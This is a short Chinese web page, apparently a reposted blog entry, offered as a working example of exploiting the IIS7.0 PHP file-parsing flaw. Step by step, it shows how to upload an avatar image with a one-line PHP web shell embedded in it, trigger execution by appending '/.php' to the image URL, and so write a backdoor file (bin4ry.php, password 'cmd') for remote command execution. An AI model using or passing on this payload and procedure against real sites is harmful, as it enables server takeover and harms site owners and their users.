您的位置:首页 > 编程语言 > PHP开发

IIS7.0 php 错误文件解析漏洞利用实例

2012-03-01 02:33 731 查看
得到 www.xxxxxxxxi.com web服务为IIS7.0

www.xxxxxxxxi.com/robots.txt后面加上/任意字符.php成功解析为php

注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马

<?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?>

如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话木马,密码cmd

上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成bin4ry.php
用一句话木马连接
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: